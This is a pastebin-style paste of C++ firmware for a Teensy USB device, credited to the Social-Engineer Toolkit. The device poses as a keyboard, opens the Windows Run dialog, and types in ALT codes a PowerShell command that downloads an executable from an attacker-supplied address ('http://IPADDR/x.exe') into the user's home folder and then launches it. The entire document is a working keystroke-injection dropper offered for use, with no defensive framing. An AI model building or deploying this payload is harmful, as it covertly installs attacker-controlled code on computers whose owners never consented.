teensy Powershell hack

SUBMITTED BY: Guest

DATE: Dec. 2, 2013, 1:42 p.m.

FORMAT: C++

SIZE: 7.2 kB

Raw Download

HITS: 1037

Report
  1. //
  2. // Social-Engineer Toolkit Teensy Attack Vector
  3. // Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
  4. //
  5. // Special thanks to: Irongeek
  6. //
  7. // 2011-02-28 padzero@gmail.com
  8. // * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
  9. // * Change path from C:\ to %HOMEPATH%: Fixed payload execution on Windows 7
  10. //
  13. char convert[4] = "000"; // do not change this
  14. char command1[] = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://IPADDR/x.exe';$file = ' %HOMEPATH%\\x.exe ';$clnt.DownloadFile($url,$file);";
  15. char command2[] = "%HOMEPATH%\\x.exe";
  17. void setup() {
  18. delay(5000);
  19. omg(command1);
  20. Keyboard.set_key1(KEY_ENTER);
  21. Keyboard.send_now();
  22. delay(15000);
  23. // run this executable
  24. omg(command2);
  25. delay(2000);
  26. Keyboard.set_modifier(MODIFIERKEY_CTRL);
  27. Keyboard.set_key1(KEY_ENTER);
  28. Keyboard.send_now();
  29. Keyboard.set_modifier(0);
  30. Keyboard.set_key1(0);
  31. Keyboard.send_now();
  32. delay(1000000);
  33. }
  34. void loop() {}
  36. void ascii_type_this(char *string)
  37. {
  38. int count, length;
  39. length = strlen(string);
  40. for(count = 0 ; count < length ; count++)
  41. {
  42. char a = string[count];
  43. ascii_input(ascii_convert(a));
  44. }
  45. }
  47. void ascii_input(char *string)
  48. {
  49. if (string == "000") return;
  50. int count, length;
  51. length = strlen(string);
  52. Keyboard.set_modifier(MODIFIERKEY_ALT);
  53. Keyboard.send_now();
  54. for(count = 0 ; count < length ; count++)
  55. {
  56. char a = string[count];
  57. if (a == '1') Keyboard.set_key1(KEYPAD_1);
  58. if (a == '2') Keyboard.set_key1(KEYPAD_2);
  59. if (a == '3') Keyboard.set_key1(KEYPAD_3);
  60. if (a == '4') Keyboard.set_key1(KEYPAD_4);
  61. if (a == '5') Keyboard.set_key1(KEYPAD_5);
  62. if (a == '6') Keyboard.set_key1(KEYPAD_6);
  63. if (a == '7') Keyboard.set_key1(KEYPAD_7);
  64. if (a == '8') Keyboard.set_key1(KEYPAD_8);
  65. if (a == '9') Keyboard.set_key1(KEYPAD_9);
  66. if (a == '0') Keyboard.set_key1(KEYPAD_0);
  67. Keyboard.send_now();
  68. Keyboard.set_key1(0);
  69. delay(11);
  70. Keyboard.send_now();
  71. }
  72. Keyboard.set_modifier(0);
  73. Keyboard.set_key1(0);
  74. Keyboard.send_now();
  75. }
  77. char* ascii_convert(char string)
  78. {
  79. if (string == 'T') return "84";
  80. if (string == ' ') return "32";
  81. if (string == '!') return "33";
  82. if (string == '\"') return "34";
  83. if (string == '#') return "35";
  84. if (string == '$') return "36";
  85. if (string == '%') return "37";
  86. if (string == '&') return "38";
  87. if (string == '\'') return "39";
  88. if (string == '(') return "40";
  89. if (string == ')') return "41";
  90. if (string == '*') return "42";
  91. if (string == '+') return "43";
  92. if (string == ',') return "44";
  93. if (string == '-') return "45";
  94. if (string == '.') return "46";
  95. if (string == '/') return "47";
  96. if (string == '0') return "48";
  97. if (string == '1') return "49";
  98. if (string == '2') return "50";
  99. if (string == '3') return "51";
  100. if (string == '4') return "52";
  101. if (string == '5') return "53";
  102. if (string == '6') return "54";
  103. if (string == '7') return "55";
  104. if (string == '8') return "56";
  105. if (string == '9') return "57";
  106. if (string == ':') return "58";
  107. if (string == ';') return "59";
  108. if (string == '<') return "60";
  109. if (string == '=') return "61";
  110. if (string == '>') return "62";
  111. if (string == '?') return "63";
  112. if (string == '@') return "64";
  113. if (string == 'A') return "65";
  114. if (string == 'B') return "66";
  115. if (string == 'C') return "67";
  116. if (string == 'D') return "68";
  117. if (string == 'E') return "69";
  118. if (string == 'F') return "70";
  119. if (string == 'G') return "71";
  120. if (string == 'H') return "72";
  121. if (string == 'I') return "73";
  122. if (string == 'J') return "74";
  123. if (string == 'K') return "75";
  124. if (string == 'L') return "76";
  125. if (string == 'M') return "77";
  126. if (string == 'N') return "78";
  127. if (string == 'O') return "79";
  128. if (string == 'P') return "80";
  129. if (string == 'Q') return "81";
  130. if (string == 'R') return "82";
  131. if (string == 'S') return "83";
  132. if (string == 'T') return "84";
  133. if (string == 'U') return "85";
  134. if (string == 'V') return "86";
  135. if (string == 'W') return "87";
  136. if (string == 'X') return "88";
  137. if (string == 'Y') return "89";
  138. if (string == 'Z') return "90";
  139. if (string == '[') return "91";
  140. if (string == '\\') return "92";
  141. if (string == ']') return "93";
  142. if (string == '^') return "94";
  143. if (string == '_') return "95";
  144. if (string == '`') return "96";
  145. if (string == 'a') return "97";
  146. if (string == 'b') return "98";
  147. if (string == 'c') return "99";
  148. if (string == 'd') return "100";
  149. if (string == 'e') return "101";
  150. if (string == 'f') return "102";
  151. if (string == 'g') return "103";
  152. if (string == 'h') return "104";
  153. if (string == 'i') return "105";
  154. if (string == 'j') return "106";
  155. if (string == 'k') return "107";
  156. if (string == 'l') return "108";
  157. if (string == 'm') return "109";
  158. if (string == 'n') return "110";
  159. if (string == 'o') return "111";
  160. if (string == 'p') return "112";
  161. if (string == 'q') return "113";
  162. if (string == 'r') return "114";
  163. if (string == 's') return "115";
  164. if (string == 't') return "116";
  165. if (string == 'u') return "117";
  166. if (string == 'v') return "118";
  167. if (string == 'w') return "119";
  168. if (string == 'x') return "120";
  169. if (string == 'y') return "121";
  170. if (string == 'z') return "122";
  171. if (string == '{') return "123";
  172. if (string == '|') return "124";
  173. if (string == '}') return "125";
  174. if (string == '~') return "126";
  175. Keyboard.print(string);
  176. return "000";
  177. }
  179. void release_keys()
  180. {
  181. Keyboard.set_modifier(0);
  182. Keyboard.set_key1(0);
  183. Keyboard.send_now();
  184. delay(100);
  185. }
  187. void send_keys(byte key, byte modifier)
  188. {
  189. if(modifier)
  190. Keyboard.set_modifier(modifier);
  191. Keyboard.set_key1(key);
  192. Keyboard.send_now();
  193. delay(100);
  194. release_keys();
  195. }
  197. void omg(char *SomeCommand)
  198. {
  199. Keyboard.set_modifier(128);
  200. Keyboard.set_key1(KEY_R);
  201. Keyboard.send_now();
  202. Keyboard.set_modifier(0);
  203. Keyboard.set_key1(0);
  204. Keyboard.send_now();
  205. delay(1500);
  206. ascii_type_this(SomeCommand);
  207. Keyboard.set_key1(KEY_ENTER);
  208. Keyboard.send_now();
  209. Keyboard.set_key1(0);
  210. Keyboard.send_now();
  211. }
comments powered by Disqus